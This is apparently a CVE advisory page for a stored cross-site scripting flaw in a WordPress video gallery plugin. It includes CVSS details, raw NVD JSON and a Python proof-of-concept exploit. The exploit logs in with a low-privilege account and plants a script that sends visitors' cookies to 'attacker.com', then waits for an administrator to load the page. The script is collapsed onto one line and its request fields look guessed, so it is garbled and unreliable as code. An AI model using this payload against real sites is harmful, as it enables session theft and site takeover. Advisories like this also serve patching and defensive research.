Security Vulnerability Report
中文
CVE-2025-62910 CVSS 6.5 MEDIUM

CVE-2025-62910

Published: 2025-10-27 02:15:50
Last Modified: 2026-04-27 18:16:30

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in deshine Video Gallery by Huzzaz huzzaz-video-gallery allows Stored XSS.This issue affects Video Gallery by Huzzaz: from n/a through <= 10.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

huzzaz-video-gallery (Video Gallery by Huzzaz) <= 10.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-62910 PoC - WordPress Video Gallery by Huzzaz Stored XSS # Target: WordPress site with huzzaz-video-gallery plugin <= 10.5 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" def get_nonce(url): """Extract WordPress nonce for form submission""" response = requests.get(f"{url}/wp-login.php") return re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text) def login_wordpress(): """Login to WordPress with low privilege account""" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } nonce = get_nonce(TARGET_URL) if nonce: login_data['_wpnonce'] = nonce.group(1) response = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) return session if 'dashboard' in response.url else None def exploit_stored_xss(session): """Inject malicious JavaScript via video gallery form""" # XSS payload - steals cookies/session xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' post_data = { 'action': 'save_video', 'video_title': xss_payload, 'video_description': '<img src=x onerror="alert(document.domain)">', 'post_type': 'huzzaz_video' } response = session.post(f"{TARGET_URL}/wp-admin/admin-ajax.php", data=post_data) return response.status_code == 200 # Execute PoC session = login_wordpress() if session and exploit_stored_xss(session): print("[+] XSS payload injected successfully!") print("[*] Wait for admin to visit gallery page to trigger payload")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62910", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:50.430", "lastModified": "2026-04-27T18:16:29.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in deshine Video Gallery by Huzzaz huzzaz-video-gallery allows Stored XSS.This issue affects Video Gallery by Huzzaz: from n/a through <= 10.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/huzzaz-video-gallery/vulnerability/wordpress-video-gallery-by-huzzaz-plugin-10-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}